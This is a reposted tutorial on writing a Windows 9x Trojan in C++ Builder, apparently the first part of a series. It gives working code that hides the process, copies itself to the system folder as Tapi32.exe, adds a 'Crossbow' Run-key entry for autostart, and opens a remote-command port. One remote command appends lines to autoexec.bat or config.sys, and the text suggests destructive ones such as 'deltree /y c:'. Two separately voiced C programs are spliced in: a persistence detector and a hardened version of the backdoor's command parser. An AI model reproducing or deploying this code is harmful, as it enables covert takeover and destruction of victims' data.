How Is a Trojan Written?

xiaoxiao 2021-03-06

"Trojan" is a term nobody should be unfamiliar with any more. Ever since the hacker group Cult of the Dead Cow released Back Orifice (BO), Trojans have been everywhere, waking the Chinese netizens who grew up in the DOS-to-Windows era from their rosy dream of the network: people finally realized that the network has a dark side too, and for a while everyone felt threatened.

I once read an article in Computer Daily about a newbie whose machine had been taken over by BO; he was so frightened that he could neither eat nor sleep all day. Well, you should know that Trojans have a long history. As early as AT&T UNIX and BSD UNIX, Trojans were written in C or shell by highly skilled young people (mostly old men by now), basically to steal the passwords of users logging in to a host in order to gain higher privileges. The main technique then was trickery: first modify the victim's .profile and plant the Trojan; when he logged in, the password he typed was saved to a file and mailed to the attacker's mailbox. Young people in China grew up on pirated DOS and could be said to be complete strangers to the network. Not until Win9x was born, and especially with the popularity of WinNT and the growth of the networking industry, did BO, a rather simple, even crude Trojan (its process is even visible in the Win9x "Close Program" dialog), give the Chinese public a huge shock; it can be called an epoch-making piece of software for network security in China.

Writing a Trojan yourself: isn't that cool?! A Trojan always consists of two parts, a server program (Server) and a client program (Client). The server is responsible for opening the door for the attack, just like an insider; the client is responsible for attacking the target. The two need a network protocol to communicate (usually TCP/IP). To help everyone better understand the secrets of Trojans and strip away their mystery, I will talk about the techniques used in writing a Trojan and write an example one, so that everyone can better guard against and remove all kinds of known and unknown Trojans.

The first step is choosing a programming tool. The popular development tools at present are C++ Builder, VC, VB and Delphi. Here we use C++ Builder (BCB below). VC is good, but its GUI design is too complicated; to better highlight my example and keep attention on the basic principles of Trojans, we use the visual BCB. Delphi is also good, but its drawback is that it cannot reuse existing resources (for example the BO2000 source code published by Cult of the Dead Cow is written in C++ and is available online; I will pick it up later). VB I won't even discuss: would you also send the victim a dynamic link library of over 1 MB, MSVBVM60.DLL?

Start C++ Builder 5.0 Enterprise Edition, create a new project, and add three VCL controls: ServerSocket from the Internet page, and NMFTP and NMSMTP from the FastNet page. ServerSocket turns this program into a server program that can provide service (open the door for the attacker). Sockets originally appeared on UNIX; Microsoft later introduced them into Windows (including Win98 and WinNT). The other two controls give the program FTP (File Transfer Protocol) and SMTP (Simple Mail Transfer Protocol) capabilities; you know what that means: the software has upload/download and email features. The Form is visible, which of course will not do; besides, a Form wastes a lot of space (a Form alone is around 300K), and a visible Trojan is useless. So when actually writing a Trojan you can use some tricks to make the program contain no Form at all, just like the Delphi version, which is only about 17K.

First we should make our program stealthy. Double-click the Form and, in its FormCreate event, first add the code that hides the Trojan from the Win9x "Close Program" dialog. This sounds mysterious, but it is only a background process called a service, which can run at a higher priority and can be said to be, like a device driver, very close to the system. So as long as our program registers itself as a service process in the process database, it will not be shown. However, this function is not declared in the header files Borland ships, so we have to declare it ourselves and fetch it from kernel32.dll. First determine whether the target's operating system is Win9x or WinNT:

{
    // In TForm1::FormCreate (needs <windows.h>, which vcl.h already pulls in)
    DWORD dwVersion = GetVersion();
    // Get the operating-system version number; the high bit is set on Win9x
    if (dwVersion >= 0x80000000)
    // The operating system is Win9x, not WinNT
    {
        typedef DWORD (CALLBACK *LPREGISTERSERVICEPROCESS)(DWORD, DWORD);
        // Declare the prototype of RegisterServiceProcess()
        HINSTANCE hDLL;
        LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
        hDLL = LoadLibrary("kernel32");
        // Load kernel32.dll, which exports RegisterServiceProcess()
        lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL, "RegisterServiceProcess");
        // Get the address of RegisterServiceProcess(); it is NULL where the export is missing
        if (lpRegisterServiceProcess != NULL)
            lpRegisterServiceProcess(GetCurrentProcessId(), 1);
        // Call RegisterServiceProcess() on our own process ID (1 = register as a service), hiding this process
        FreeLibrary(hDLL);
        // Unload the dynamic link library
    }
}

That is it, we are now invisible (that cost me a lot of code!). Why check the operating system? Because WinNT's process manager sees through the current process anyway, so the code above is useless under WinNT (other methods exist there; that is left for later). There is a more concrete reason as well: RegisterServiceProcess is only exported by the Win9x kernel32.dll, so on WinNT GetProcAddress returns NULL and calling the result would crash the program. Next, copy ourselves into the %system% directory, for example c:\windows\system, and modify the registry so that we are loaded automatically at startup:

{
    // Still inside FormCreate; SystemPath is an AnsiString declared in the unit header,
    // TRegistry needs <Registry.hpp> and ParamStr() needs <SysUtils.hpp>
    char TempPath[MAX_PATH];
    // Declare a buffer for the path
    GetSystemDirectory(TempPath, MAX_PATH);
    // TempPath receives the System directory, MAX_PATH is the buffer size: this gets the target's SYSTEM directory
    SystemPath = AnsiString(TempPath);
    // Convert TempPath into an AnsiString so the usual string operations can be used on it
    CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath + "\\Tapi32.exe").c_str(), FALSE);
    // Copy ourselves (ParamStr(0) is our own path) into %system% under the name Tapi32.exe as camouflage; FALSE overwrites an existing file
    TRegistry *Registry = new TRegistry;
    // Create a TRegistry object, ready to modify the registry; this step is essential
    Registry->RootKey = HKEY_LOCAL_MACHINE;
    // Set the root key to HKEY_LOCAL_MACHINE
    Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", TRUE);
    // Open HKLM\Software\Microsoft\Windows\CurrentVersion\Run, creating it if it does not exist
    try
    {
        // If the following statements throw, jump to catch to avoid crashing
        if (Registry->ReadString("Crossbow") != SystemPath + "\\Tapi32.exe")
            Registry->WriteString("Crossbow", SystemPath + "\\Tapi32.exe");
        // Check whether the value named "Crossbow" already points to %system%\Tapi32.exe;
        // if not, write that value and content
    }
    catch (...)
    {
        // If something goes wrong, do nothing
    }
    Registry->CloseKey();
    delete Registry;
    // Release the registry object; the original never freed it
}

OK, the FormCreate handler is complete: Tapi32.exe is loaded automatically at every startup and does not appear in the Close Program dialog. That is the prototype of the Trojan.
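The persistence just installed leaves two indicators on the host: a Run value named Crossbow, and an image at %system%\Tapi32.exe under whatever value name it was registered. The C program below is an added example and not code from the article: it parses lines in the format reg.exe prints for "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" and flags every entry matching either indicator, including a copy registered under another value name, quoted, or with arguments. The system directory C:\WINDOWS\SYSTEM and the sample dump are constructed assumptions for the example.

```c
/* Added example (not from the article): hunt for the persistence the Trojan
 * installs. Parses lines in the format printed by
 *   reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 * and flags the two indicators the article defines: a value named "Crossbow"
 * or any value whose image is %system%\Tapi32.exe. SYSTEM_DIR and the sample
 * dump are constructed for this example, not captured from a real host. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define SYSTEM_DIR "C:\\WINDOWS\\SYSTEM"   /* assumed %system% of the scanned host */

/* Constructed reg.exe-style dump: two benign-looking entries, one obvious
 * Crossbow entry, and one copy registered under a different name with arguments. */
static const char SAMPLE_DUMP[] =
    "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n"
    "    ScanRegistry    REG_SZ    C:\\WINDOWS\\scanregw.exe /autorun\r\n"
    "    SystemTray    REG_SZ    SysTray.Exe\r\n"
    "    Crossbow    REG_SZ    c:\\windows\\system\\tapi32.exe\r\n"
    "    Updater    REG_SZ    \"C:\\Windows\\System\\Tapi32.exe\" -q\r\n"
    "    TaskMonitor    REG_SZ    C:\\WINDOWS\\taskmon.exe\r\n";

/* Case-insensitive ASCII string equality (paths and value names are case-insensitive). */
static int ieq(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* Strip leading and trailing whitespace (including the CR of CRLF lines) in place. */
static void trim(char *s)
{
    size_t start = 0, len = strlen(s);
    while (start < len && isspace((unsigned char)s[start]))
        start++;
    while (len > start && isspace((unsigned char)s[len - 1]))
        len--;
    memmove(s, s + start, len - start);
    s[len - start] = '\0';
}

/* Split "    Name    REG_SZ    Data" into name and data. Returns 0 for lines
 * without a REG_* type token (the key header, blank lines). */
static int parse_run_line(const char *line, char *name, size_t nlen, char *data, size_t dlen)
{
    const char *type = strstr(line, "REG_");
    const char *p;
    size_t n;
    if (type == NULL || type == line || !isspace((unsigned char)type[-1]))
        return 0;
    n = (size_t)(type - line);
    if (n >= nlen)
        return 0;
    memcpy(name, line, n);
    name[n] = '\0';
    trim(name);
    for (p = type; *p != '\0' && !isspace((unsigned char)*p); p++)
        ;                                   /* skip the REG_xxx token itself */
    if (strlen(p) >= dlen)
        return 0;
    strcpy(data, p);
    trim(data);
    return name[0] != '\0';
}

/* Match one Run entry against the article's indicators. The image is the data
 * up to the closing quote (quoted path) or the first space (unquoted path). */
int is_crossbow_entry(const char *name, const char *data)
{
    char image[512], expected[512];
    size_t i = 0;
    const char *p = data;
    char stop = ' ';
    if (*p == '"') {
        p++;
        stop = '"';
    }
    while (*p != '\0' && *p != stop && i + 1 < sizeof image)
        image[i++] = *p++;
    image[i] = '\0';
    snprintf(expected, sizeof expected, "%s\\Tapi32.exe", SYSTEM_DIR);
    return ieq(name, "Crossbow") || ieq(image, expected);
}

static void append_hit(char *hits, size_t hlen, const char *name, int first)
{
    size_t used = strlen(hits);
    if (!first && used + 1 < hlen) {
        hits[used++] = ',';
        hits[used] = '\0';
    }
    if (used + 1 < hlen)
        strncat(hits, name, hlen - used - 1);
}

/* Scan a whole dump; returns the number of matching entries and, when hits is
 * non-NULL, writes their value names comma-separated into it. */
int scan_run_output(const char *dump, char *hits, size_t hlen)
{
    char line[1024], name[256], data[768];
    int count = 0;
    if (hits != NULL && hlen > 0)
        hits[0] = '\0';
    while (*dump != '\0') {
        const char *nl = strchr(dump, '\n');
        size_t n = nl ? (size_t)(nl - dump) : strlen(dump);
        const char *next = nl ? nl + 1 : dump + n;
        if (n >= sizeof line)
            n = sizeof line - 1;
        memcpy(line, dump, n);
        line[n] = '\0';
        dump = next;
        if (parse_run_line(line, name, sizeof name, data, sizeof data) &&
            is_crossbow_entry(name, data)) {
            if (hits != NULL && hlen > 0)
                append_hit(hits, hlen, name, count == 0);
            count++;
        }
    }
    return count;
}

int main(void)
{
    char hits[256];
    int n = scan_run_output(SAMPLE_DUMP, hits, sizeof hits);
    printf("%d suspicious Run entries: %s\n", n, n ? hits : "(none)");
    return n ? 1 : 0;
}
```

To use it on a real host, pipe the output of reg query into the program in place of SAMPLE_DUMP and adjust SYSTEM_DIR to the host's actual system directory; the value-name match catches the article's Trojan as written, and the image match catches the same file registered under any other name.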

Next select the ServerSocket control and set Active to TRUE in the Object Inspector on the left, so the program opens a specific port and runs as a server. Set Port to 4444; that is the Trojan's port number, and of course you can use another. But be careful not to use a low port below 1024, because that may not only conflict with the ports used by the basic network protocols but is also easy to discover, so try to use a high port above 1024 (there is also a technique of deliberately using a specific port, because Windows does not report an error when a conflict occurs ^_^). Look at the port used by the TNMFTP control: it is the dedicated control port of the FTP protocol; likewise the port of TNMSMTP is the dedicated SMTP port. Select the ServerSocket control, click the Events page, double-click the OnClientRead event and type the following code:

{
    // TForm1::ServerSocket1ClientRead, run whenever the client sends data; SystemPath was set in FormCreate
    FILE *fp = NULL;
    int times_of_try;
    char TempFile[MAX_PATH];
    // Declare the variables used later
    sprintf(TempFile, "%s", AnsiString(SystemPath + AnsiString("\\Win369.bat")).c_str());
    // Path of a text file Win369.bat under %system%, used as a temporary file
    AnsiString Temp = Socket->ReceiveText();
    // Receive the data sent by the client (the attacker, i.e. yourself)
    // ... the command handlers that examine Temp follow here ...
}

OK, the door is open! Next comes modifying the target machine's various settings. ^_^ Let's start by modifying autoexec.bat and config.sys:

{
    // Inside the OnClientRead handler, after Temp has been received; chmod() needs <io.h> and <sys/stat.h>
    if (Temp.SubString(1, 9) == "edit conf")
    // If the first nine characters of the received string are "edit conf" (AnsiString::SubString is 1-based)
    {
        int number = Temp.Length();
        // Get the length of the string
        int file_name = atoi((Temp.SubString(11, 1)).c_str());
        // Convert the 11th character to an integer and store it in file_name
        // Why the 11th character? Because the 10th character is a space
        AnsiString Content = Temp.SubString(12, number - 11) + "\n";
        // The rest of the string plus a newline is what will be written to the target file
        // (kept in an AnsiString; the original stored the c_str() of a temporary, which dangles once it is destroyed)
        FILE *fp = NULL;
        int times_of_try;
        char filename[20];
        chmod("c:\\autoexec.bat", S_IREAD | S_IWRITE);
        chmod("c:\\config.sys", S_IREAD | S_IWRITE);
        // Make both target files readable and writable
        if (file_name == 1)
            sprintf(filename, "%s", "c:\\autoexec.bat");
        // If the 11th character is 1, the target is autoexec.bat
        else if (file_name == 2)
            sprintf(filename, "%s", "c:\\config.sys");
        // If the 11th character is 2, the target is config.sys
        else
        {
            Socket->SendText("Bad target");
            goto end;
        }
        // Any other selector would leave filename uninitialised, so report it and stop
        times_of_try = 0;
        // Counter for the open attempts
        while (fp == NULL)
        {
            // As long as the file pointer is still empty
            fp = fopen(filename, "a+");
            // Create the file if it does not exist; if it exists, prepare to append to it
            // If this fails the pointer stays NULL, so the loop retries
            times_of_try = times_of_try + 1;
            // Counter plus 1
            if (times_of_try > 100)
            {
                // After 100 attempts it still has not succeeded
                Socket->SendText("Fail by open file");
                // Send the error message "Fail by open file" back to the client
                goto end;
                // Jump to end
            }
        }
        fwrite(Content.c_str(), sizeof(char), Content.Length(), fp);
        // Append the received line, for example deltree /y c: or format /q /autotest c:, enough?!
        fclose(fp);
        // Finish writing the target file
        Socket->SendText("Success");
        // Send "Success" back to the client
    }
end:
    ;
}
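The handler above slices the received string at fixed offsets, and with a selector other than 1 or 2 it has no filename to open. As an added example that is not part of the article, here is a portable C reimplementation of the "edit conf" parsing with the checks a practitioner would want: exact command match, selector validation, CR/LF stripping, a bounded copy, and the article's own "Success" and "Fail by open file" replies. The command syntax, the two target files and those two reply strings come from the article; the status codes, the struct, the other reply strings and the sample messages are my own constructions.

```c
/* Added example (not from the article): portable reimplementation of the
 * server's "edit conf <n> <text>" command handling with input validation.
 * The command syntax, the two target files and the replies "Success" and
 * "Fail by open file" come from the article; everything else is assumed. */
#include <stdio.h>
#include <string.h>

enum edit_status {
    EDIT_OK = 0,
    EDIT_NOT_THIS_CMD,   /* message does not start with "edit conf" */
    EDIT_BAD_TARGET,     /* selector missing or not 1/2 */
    EDIT_EMPTY,          /* nothing to append */
    EDIT_IO_ERROR        /* target file could not be opened or written */
};

struct edit_cmd {
    const char *target;  /* resolved path of the file to append to */
    char text[256];      /* payload, newline-terminated */
};

/* Selector digit -> target file, as in the article (only 1 and 2 are defined). */
static const char *target_for(char selector)
{
    switch (selector) {
    case '1': return "c:\\autoexec.bat";
    case '2': return "c:\\config.sys";
    default:  return NULL;  /* the article's code has no filename for this case */
    }
}

/* Parse one client message using the article's fixed layout: bytes 0-8 are
 * "edit conf", byte 9 a space, byte 10 the selector, byte 11 a space and the
 * rest the text to append. A trailing CR/LF sent by the client is dropped. */
enum edit_status parse_edit_conf(const char *msg, struct edit_cmd *out)
{
    size_t len = strlen(msg);
    const char *payload;
    size_t plen;

    if (len < 9 || strncmp(msg, "edit conf", 9) != 0)
        return EDIT_NOT_THIS_CMD;
    if (len < 11 || msg[9] != ' ' || (out->target = target_for(msg[10])) == NULL)
        return EDIT_BAD_TARGET;

    payload = msg + 11;
    if (*payload == ' ')               /* separator between selector and text */
        payload++;
    plen = strcspn(payload, "\r\n");
    if (plen == 0)
        return EDIT_EMPTY;
    if (plen > sizeof out->text - 2)   /* keep room for '\n' and the NUL */
        plen = sizeof out->text - 2;
    memcpy(out->text, payload, plen);
    out->text[plen] = '\n';
    out->text[plen + 1] = '\0';
    return EDIT_OK;
}

/* Append the parsed text with a single open attempt: retrying fopen() 100
 * times in a tight loop, as the article does, cannot fix a read-only file. */
enum edit_status apply_edit(const struct edit_cmd *cmd)
{
    FILE *fp = fopen(cmd->target, "a");
    if (fp == NULL)
        return EDIT_IO_ERROR;
    if (fputs(cmd->text, fp) == EOF) {
        fclose(fp);
        return EDIT_IO_ERROR;
    }
    return fclose(fp) == 0 ? EDIT_OK : EDIT_IO_ERROR;
}

/* Reply the server sends back; the first two strings are the article's own. */
const char *reply_for(enum edit_status st)
{
    switch (st) {
    case EDIT_OK:         return "Success";
    case EDIT_IO_ERROR:   return "Fail by open file";
    case EDIT_BAD_TARGET: return "Bad target";
    case EDIT_EMPTY:      return "Nothing to write";
    default:              return "Unknown command";
    }
}

int main(void)
{
    /* Constructed client messages, as ServerSocket->ReceiveText() would hand them over. */
    const char *msgs[] = {
        "edit conf 1 SET PATH=C:\\WINDOWS\r\n",
        "edit conf 3 DEVICE=C:\\HIMEM.SYS\r\n",
        "edit conf 1",
        "dir\r\n",
    };
    size_t i;
    for (i = 0; i < sizeof msgs / sizeof msgs[0]; i++) {
        struct edit_cmd cmd;
        enum edit_status st = parse_edit_conf(msgs[i], &cmd);
        /* Parsing only; apply_edit() would write to the target of message 0. */
        printf("message %u: %s (target %s)\n", (unsigned)i, reply_for(st),
               st == EDIT_OK ? cmd.target : "none");
    }
    return 0;
}
```

The parser keeps the article's layout so that the same client works against it, but every field is validated before anything touches the filesystem, and the separator space is dropped rather than written into the file as the original does.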

You can now change these two files on the target over the network and append any command you like to them. Oh, this is only a first taste. Friends, don't go away! (To be continued)

This article is reproduced from China Software (http://www.9cbs.net).

Please cite the original address when reposting: https://www.9cbs.com/read-58975.html
